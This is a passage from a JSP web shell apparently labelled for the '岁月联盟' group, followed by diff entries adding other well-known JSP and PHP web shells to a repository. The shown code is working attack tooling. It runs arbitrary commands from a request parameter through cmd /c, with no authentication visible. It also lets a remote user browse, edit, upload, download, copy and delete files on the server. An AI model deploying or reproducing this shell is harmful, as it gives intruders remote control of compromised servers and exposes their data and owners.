String strTmpFile=strDesFile;
if(f_des.isDirectory())
{
if(!strDesFile.endsWith("\\"))
{
strDesFile=strDesFile+"\\";
}
strTmpFile=strDesFile+"cqq_"+strFile;
}
File f_des_copy=new File(strTmpFile);
FileInputStream in1=new FileInputStream(f);
FileOutputStream out1=new FileOutputStream(f_des_copy);
byte[] buffer=new byte[1024];
int c;
while((c=in1.read(buffer))!=-1)
{
out1.write(buffer,0,c);
}
in1.close();
out1.close();
sbSaveCopy.append("原始文件 "+strPath+"<p>");
sbSaveCopy.append("目标文件 "+strTmpFile+"<p>");
sbSaveCopy.append("<font color=red>复制成功!</font>");
}
}
sbSaveCopy.append("<p><input type=button name=saveCopyBack onclick='history.back(-2);' value=返回>");
}
if(strAction!=null && strAction.equals("newFile"))
{
String strF=request.getParameter("fileName");
String strType1=request.getParameter("btnNewFile");
String strType2=request.getParameter("btnNewDir");
String strType="";
if(strType1==null)
{
strType="Dir";
}
else if(strType2==null)
{
strType="File";
}
if(!strType.equals("") && !(strF==null || strF.equals("")))
{
File f_new=new File(strF);
if(strType.equals("File") && !f_new.createNewFile())
sbNewFile.append(strF+" 文件创建失败");
if(strType.equals("Dir") && !f_new.mkdirs())
sbNewFile.append(strF+" 目录创建失败");
}
else
{
sbNewFile.append("<p><font color=red>建立文件或目录出错。</font>");
}
}
if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart")))
{
String tempdir=".";
boolean error=false;
response.setContentType("text/html");
sbNewFile.append("<p><font color=red>建立文件或目录出错。</font>");
HttpMultiPartParser parser = new HttpMultiPartParser();
int bstart = request.getContentType().lastIndexOf("oundary=");
String bound = request.getContentType().substring(bstart + 8);
int clength = request.getContentLength();
Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength);
if (ht.get("cqqUploadFile") != null)
{
FileInfo fi = (FileInfo) ht.get("cqqUploadFile");
File f1 = fi.file;
UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
if (info != null && info.aborted)
{
f1.delete();
request.setAttribute("error", "Upload aborted");
}
else
{
String path = (String) ht.get("path");
if(path!=null && !path.endsWith("\\"))
path = path + "\\";
if (!f1.renameTo(new File(path + f1.getName())))
{
request.setAttribute("error", "Cannot upload file.");
error = true;
f1.delete();
}
}
}
}
%>
<html>
<head>
<style type="text/css">
td,select,input,body{font-size:9pt;}
A { TEXT-DECORATION: none }
#tablist{
padding: 5px 0;
margin-left: 0;
margin-bottom: 0;
margin-top: 0.1em;
font:9pt;
}
#tablist li{
list-style: none;
display: inline;
margin: 0;
}
#tablist li a{
padding: 3px 0.5em;
margin-left: 3px;
border: 1px solid ;
background: F6F6F6;
}
#tablist li a:link, #tablist li a:visited{
color: navy;
}
#tablist li a.current{
background: #EAEAFF;
}
#tabcontentcontainer{
width: 100%;
padding: 5px;
border: 1px solid black;
}
.tabcontent{
display:none;
}
</style>
<script type="text/javascript">
var initialtab=[<%=tabID%>, "menu<%=tabID%>"]
////////Stop editting////////////////
function cascadedstyle(el, cssproperty, csspropertyNS){
if (el.currentStyle)
return el.currentStyle[cssproperty]
else if (window.getComputedStyle){
var elstyle=window.getComputedStyle(el, "")
return elstyle.getPropertyValue(csspropertyNS)
}
}
var previoustab=""
function expandcontent(cid, aobject){
if (document.getElementById){
highlighttab(aobject)
if (previoustab!="")
document.getElementById(previoustab).style.display="none"
document.getElementById(cid).style.display="block"
previoustab=cid
if (aobject.blur)
aobject.blur()
return false
}
else
return true
}
function highlighttab(aobject){
if (typeof tabobjlinks=="undefined")
collecttablinks()
for (i=0; i<tabobjlinks.length; i++)
tabobjlinks[i].style.backgroundColor=initTabcolor
var themecolor=aobject.getAttribute("theme")? aobject.getAttribute("theme") : initTabpostcolor
aobject.style.backgroundColor=document.getElementById("tabcontentcontainer").style.backgroundColor=themecolor
}
function collecttablinks(){
var tabobj=document.getElementById("tablist")
tabobjlinks=tabobj.getElementsByTagName("A")
}
function do_onload(){
collecttablinks()
initTabcolor=cascadedstyle(tabobjlinks[1], "backgroundColor", "background-color")
initTabpostcolor=cascadedstyle(tabobjlinks[0], "backgroundColor", "background-color")
expandcontent(initialtab[1], tabobjlinks[initialtab[0]-1])
}
if (window.addEventListener)
window.addEventListener("load", do_onload, false)
else if (window.attachEvent)
window.attachEvent("onload", do_onload)
else if (document.getElementById)
window.onload=do_onload
</script>
<script language="javascript">
function doForm(action,path,file,cmd,tab,content)
{
document.frmCqq.action.value=action;
document.frmCqq.path.value=path;
document.frmCqq.file.value=file;
document.frmCqq.cmd.value=cmd;
document.frmCqq.tabID.value=tab;
document.frmCqq.content.value=content;
if(action=="del")
{
if(confirm("确定要删除文件 "+file+" 吗?"))
document.frmCqq.submit();
}
else
{
document.frmCqq.submit();
}
}
</script>
<title>JSP Shell 岁月联盟专用版本</title>
<head>
<body>
<form name="frmCqq" method="post" action="">
<input type="hidden" name="action" value="">
<input type="hidden" name="path" value="">
<input type="hidden" name="file" value="">
<input type="hidden" name="cmd" value="">
<input type="hidden" name="tabID" value="2">
<input type="hidden" name="content" value="">
</form>
<!--Top Menu Started-->
<ul id="tablist">
<li><a href="http://www.smallrain.net" class="current" onClick="return expandcontent('menu1', this)"> <%=strFileManage[languageNo]%> </a></li>
<li><a href="new.htm" onClick="return expandcontent('menu2', this)" theme="#EAEAFF"> <%=strCommand[languageNo]%> </a></li>
<li><a href="hot.htm" onClick="return expandcontent('menu3', this)" theme="#EAEAFF"> <%=strSysProperty[languageNo]%> </a></li>
<li><a href="search.htm" onClick="return expandcontent('menu4', this)" theme="#EAEAFF"> <%=strHelp[languageNo]%> </a></li>
&nbsp; <%=authorInfo[languageNo]%>
</ul>
<!--Top Menu End-->
<%
StringBuffer sbFolder=new StringBuffer("");
StringBuffer sbFile=new StringBuffer("");
try
{
File objFile = new File(strDir);
File list[] = objFile.listFiles();
if(objFile.getAbsolutePath().length()>3)
{
sbFolder.append("<tr><td >&nbsp;</td><td><a href=\"javascript:doForm('','"+formatPath(objFile.getParentFile().getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(strParentFolder[languageNo]+"</a><br>- - - - - - - - - - - </td></tr>\r\n ");
}
for(int i=0;i<list.length;i++)
{
if(list[i].isDirectory())
{
sbFolder.append("<tr><td >&nbsp;</td><td>");
sbFolder.append(" <a href=\"javascript:doForm('','"+formatPath(list[i].getAbsolutePath())+"','','"+strCmd+"','1','');\">");
sbFolder.append(list[i].getName()+"</a><br></td></tr> ");
}
else
{
String strLen="";
String strDT="";
long lFile=0;
lFile=list[i].length();
strLen = convertFileSize(lFile);
Date dt=new Date(list[i].lastModified());
strDT=dt.toLocaleString();
sbFile.append("<tr onmouseover=\"this.style.backgroundColor='#FBFFC6'\" onmouseout=\"this.style.backgroundColor='white'\"><td>");
sbFile.append(""+list[i].getName());
sbFile.append("</td><td>");
sbFile.append(""+strLen);
sbFile.append("</td><td>");
sbFile.append(""+strDT);
sbFile.append("</td><td>");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('edit','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileEdit[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('del','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDel[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('down','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileDown[languageNo]+"</a> ");
sbFile.append(" &nbsp;<a href=\"javascript:doForm('copy','"+formatPath(strDir)+"','"+list[i].getName()+"','"+strCmd+"','"+tabID+"','');\">");
sbFile.append(strFileCopy[languageNo]+"</a> ");
}
}
}
catch(Exception e)
{
out.println("<font color=red>操作失败: "+e.toString()+"</font>");
}
%>
<DIV id="tabcontentcontainer">
<div id="menu3" class="tabcontent">
<br>
<br> &nbsp;&nbsp; 未完成
<br>
<br>&nbsp;
</div>
<div id="menu4" class="tabcontent">
<br>
<p>一、功能说明</p>
<p>&nbsp;&nbsp;&nbsp; jsp 版本的文件管理器,通过该程序可以远程管理服务器上的文件系统,您可以新建、修改、</p>
<p>删除、下载文件和目录。对于windows系统还提供了命令行窗口的功能可以运行一些程序类似</p>
<p>与windows的cmd。</p>
<p>&nbsp;</p>
<p>二、测试</p>
<p>&nbsp;&nbsp;&nbsp;<b>请大家在使用过程中,有任何问题,意见或者建议都可以给我留言,以便使这个程序更加完善和稳定,<p>
留言地址为:<a href="http://bbs.syue.com/" target="_blank">http://bbs.syue.com/</a></b>
<p>&nbsp;</p>
<p>三、更新记录</p>
<p>&nbsp;&nbsp;&nbsp; 2004.11.15&nbsp; V0.9测试版发布,增加了一些基本的功能,文件编辑、复制、删除、下载、上传以及新建文件目录功能</p>
<p>&nbsp;&nbsp;&nbsp; 2004.10.27&nbsp; 暂时定为0.6版吧, 提供了目录文件浏览功能 和 cmd功能</p>
<p>&nbsp;&nbsp;&nbsp; 2004.09.20&nbsp; 第一个jsp&nbsp;程序就是这个简单的显示目录文件的小程序</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
</div>
<div id="menu1" class="tabcontent">
<%
out.println("<table border='1' width='100%' bgcolor='#FBFFC6' cellspacing=0 cellpadding=5 bordercolorlight=#000000 bordercolordark=#FFFFFF><tr><td width='30%'>"+strCurrentFolder[languageNo]+" <b>"+strDir+"</b></td><td>" + getDrivers() + "</td></tr></table><br>\r\n");
%>
<table width="100%" border="1" cellspacing="0" cellpadding="5" bordercolorlight="#000000" bordercolordark="#FFFFFF">
<tr>
<td width="25%" align="center" valign="top">
<table width="98%" border="0" cellspacing="0" cellpadding="3">
<%=sbFolder%>
</tr>
</table>
</td>
<td width="81%" align="left" valign="top">
<%
if(strAction!=null && strAction.equals("edit"))
{
out.println(sbEdit.toString());
}
else if(strAction!=null && strAction.equals("copy"))
{
out.println(sbCopy.toString());
}
else if(strAction!=null && strAction.equals("down"))
{
out.println(sbDown.toString());
}
else if(strAction!=null && strAction.equals("savecopy"))
{
out.println(sbSaveCopy.toString());
}
else if(strAction!=null && strAction.equals("newFile") && !sbNewFile.toString().equals(""))
{
out.println(sbNewFile.toString());
}
else
{
%>
<span id="EditBox"><table width="98%" border="1" cellspacing="1" cellpadding="4" bordercolorlight="#cccccc" bordercolordark="#FFFFFF" bgcolor="white" >
<tr bgcolor="#E7e7e6">
<td width="26%"><%=strFileName[languageNo]%></td>
<td width="19%"><%=strFileSize[languageNo]%></td>
<td width="29%"><%=strLastModified[languageNo]%></td>
<td width="26%"><%=strFileOperation[languageNo]%></td>
</tr>
<%=sbFile%>
<!-- <tr align="center">
<td colspan="4"><br>
总计文件个数:<font color="#FF0000">30</font> ,大小:<font color="#FF0000">664.9</font>
KB </td>
</tr>
-->
</table>
</span>
<%
}
%>
</td>
</tr>
<form name="frmMake" action="" method="post">
<tr><td colspan=2 bgcolor=#FBFFC6>
<input type="hidden" name="action" value="newFile">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<%
if(!strDir.endsWith("\\"))
strDir = strDir + "\\";
%>
<input type="text" name="fileName" size=36 value="<%=strDir%>">
<input type="submit" name="btnNewFile" value="新建文件" onclick="frmMake.submit()" >
<input type="submit" name="btnNewDir" value="新建目录" onclick="frmMake.submit()" >
</form>
<form name="frmUpload" enctype="multipart/form-data" action="" method="post">
<input type="hidden" name="action" value="upload">
<input type="hidden" name="path" value="<%=strDir%>">
<input type="hidden" name="file" value="<%=strFile%>">
<input type="hidden" name="cmd" value="<%=strCmd%>">
<input type="hidden" name="tabID" value="1">
<input type="hidden" name="content" value="">
<input type="file" name="cqqUploadFile" size="36">
<input type="submit" name="submit" value="上传">
</td></tr></form>
</table>
</div>
<div id="menu2" class="tabcontent">
<%
String line="";
StringBuffer sbCmd=new StringBuffer("");
if(strCmd!=null)
{
try
{
//out.println(strCmd);
Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null)
{
sbCmd.append(line+"\r\n");
}
}
catch(Exception e)
{
System.out.println(e.toString());
}
}
else
{
strCmd = "set";
}
%>
<form name="cmd" action="" method="post">
&nbsp;
<input type="text" name="cmd" value="<%=strCmd%>" size=50>
<input type="hidden" name="tabID" value="2">
<input type=submit name=submit value="<%=strExecute[languageNo]%>">
</form>
<%
if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
{
%>
&nbsp;<TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TEXTAREA>
<br>&nbsp;
<%
}
%>
</DIV>
</div>
<br><br>
<center><a href="http://www.syue.com" target="_blank">岁月</a>
<br>

3294
jsp/t00ls.jsp Normal file

File diff suppressed because it is too large Load diff

BIN
other/icesword.war Normal file

Binary file not shown.

38
php/404.php Normal file

File diff suppressed because one or more lines are too long

2720
php/icesword.php Normal file

File diff suppressed because one or more lines are too long

1284
php/itsec.php Normal file

File diff suppressed because it is too large Load diff

2210
php/silic.php Normal file

File diff suppressed because one or more lines are too long

2136
php/spy.php Normal file

File diff suppressed because it is too large Load diff